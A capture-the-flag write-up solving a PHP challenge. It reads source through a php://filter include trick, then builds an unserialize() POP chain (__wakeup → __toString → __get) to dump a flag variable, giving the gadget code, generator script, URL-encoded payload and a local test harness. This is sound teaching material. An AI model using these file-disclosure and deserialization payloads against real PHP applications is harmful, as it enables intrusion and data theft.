POP chain
Challenge
<?php
error_reporting(0);
include("./try.php");
if(isset($_GET['fn'])){
if(check_fn($_GET['fn'])){
include($_GET['fn']);
}
}else{
unserialize($_GET['code']);
}
highlight_file(__FILE__);
?>
The challenge includes try.php, so the first step is to read it. The include() path is only checked by check_fn(), which (as we see once the file is read) rejects "string", "zlib" and "flag", so a php://filter wrapper with the base64 filter passes:
?fn=php://filter/read=convert.base64-encode/resource=try.php
Contents of try.php (after base64-decoding):
<?php
$test = "Hello world";
include "flag.php";
function check_fn($filename){
$result = preg_match("/string|zlib|flag/i", $filename);
if($result){
return FALSE;
}
return TRUE;
}
class agood {
private $gooda;
public function __construct($file){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
function __wakeup(){
$temp = $this->gooda . 'ctf';
}
}
class bgood {
private $items = array();
public function __toString() {
$item = $this->items;
$str = $item['ss']->sword;
return 'what the good?';
}
}
class cgood {
private $params = array();
public function __get($key) {
global $flag;
$tmp = $this->params[$key];
var_dump($$tmp);
}
}
?>
__wakeup(): fires when an object is restored by unserialize(). (The classic bypass, declaring more properties in the serialized string than the class really has, only matters when you want to skip it; here we want it to run.)
__toString(): fires when an object is used as a string, e.g. in concatenation.
__get($key): fires when code reads a property that is inaccessible (private/protected from outside) or does not exist.
Solution idea:
Do not send fn, so index.php takes the else branch and unserialize()s the code parameter. The chain then fires automatically:
1. unserialize() restores an agood object and calls its __wakeup(), which concatenates $this->gooda with 'ctf'. If $gooda holds a bgood object, the concatenation uses it as a string and triggers bgood::__toString().
2. __toString() reads $this->items['ss']->sword. With items['ss'] set to a cgood object, sword is not an accessible property of cgood, so cgood::__get('sword') is invoked.
3. __get() looks up $this->params['sword'] into $tmp and then runs var_dump($$tmp). This is a variable variable, not an overwrite: with params['sword'] = "flag", $$tmp resolves to $flag, which the method imported with global $flag from the included flag.php, so the flag is dumped.
So the object graph is agood->gooda = bgood, bgood->items['ss'] = cgood, cgood->params['sword'] = "flag".
<?php
// Payload generator: the magic methods are not needed here, only the
// property names and visibility, because serialize() records those.
// The constructors exist only to wire the object graph together.
class agood{
private $gooda; // private, so it is serialized as "\0agood\0gooda"
function __construct()
{
$this->gooda = new bgood(); // concatenated in __wakeup -> __toString
}
}
class bgood{
private $items = array();
function __construct(){
$this->items = array("ss"=>new cgood()); // items['ss']->sword -> __get
}
}
class cgood{
private $params = array("sword"=>"flag"); // $tmp = "flag", $$tmp = $flag
}
echo serialize(new agood());
?>
O:5:"agood":1:{s:12:"agoodgooda";O:5:"bgood":1:{s:12:"bgooditems";a:1:{s:2:"ss";O:5:"cgood":1:{s:13:"cgoodparams";a:1:{s:5:"sword";s:4:"flag";}}}}}
Because every property is private, PHP serializes its name as \0ClassName\0name, and the s:12 / s:13 length prefixes above already count those two null bytes. The null bytes themselves are invisible in the echoed output (and cannot be typed into a URL), so they have to be added back as %00, either by hand as below or by wrapping the payload in urlencode().
O:5:%22agood%22:1:{s:12:%22%00agood%00gooda%22;O:5:%22bgood%22:1:{s:12:%22%00bgood%00items%22;a:1:{s:2:%22ss%22;O:5:%22cgood%22:1:{s:13:%22%00cgood%00params%22;a:1:{s:5:%22sword%22;s:4:%22flag%22;}}}}}
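The following is an added example, not part of the original writeup. It reproduces the try.php gadgets locally so the chain from the solution idea can be watched end to end, and it uses urlencode() to handle the %00 bytes instead of editing the payload by hand. The $flag value and the constructor signatures are assumptions for the harness; the challenge's real flag.php is not known.

```php
<?php
// Local harness for the POP chain in try.php (added example, not the
// challenge's own code). $flag stands in for the value flag.php would set.
$flag = "flag{local_test_only}";   // assumed value for the test

class agood {
    private $gooda;
    public function __construct($gooda = null) { $this->gooda = $gooda; }
    function __wakeup() {
        // String concatenation forces bgood::__toString() on $this->gooda.
        $temp = $this->gooda . 'ctf';
    }
}

class bgood {
    private $items = array();
    public function __construct($items = array()) { $this->items = $items; }
    public function __toString() {
        $item = $this->items;
        // 'sword' is not an accessible property of cgood -> cgood::__get('sword').
        $str = $item['ss']->sword;
        return 'what the good?';
    }
}

class cgood {
    private $params = array();
    public function __construct($params = array()) { $this->params = $params; }
    public function __get($key) {
        global $flag;
        $tmp = $this->params[$key];   // "flag"
        var_dump($$tmp);              // variable variable: $$tmp is $flag
    }
}

// Build the object graph bottom-up: cgood -> bgood -> agood.
$chain = new agood(new bgood(array("ss" => new cgood(array("sword" => "flag")))));
$payload = serialize($chain);

// Private property names are mangled as "\0class\0prop"; the length prefix
// already includes both null bytes, so only the bytes need URL-encoding.
assert(strpos($payload, "s:12:\"\0agood\0gooda\"") !== false);

// urlencode() emits the null bytes as %00, ready for ?code=...
echo urlencode($payload), "\n";

// Fire the chain locally: __wakeup -> __toString -> __get -> var_dump($flag)
unserialize($payload);   // prints: string(21) "flag{local_test_only}"
?>
```

Run it with the PHP CLI; the first output line is the URL-safe payload and the second is the var_dump of $flag, confirming that the chain reaches the global without any property being directly readable from outside its class.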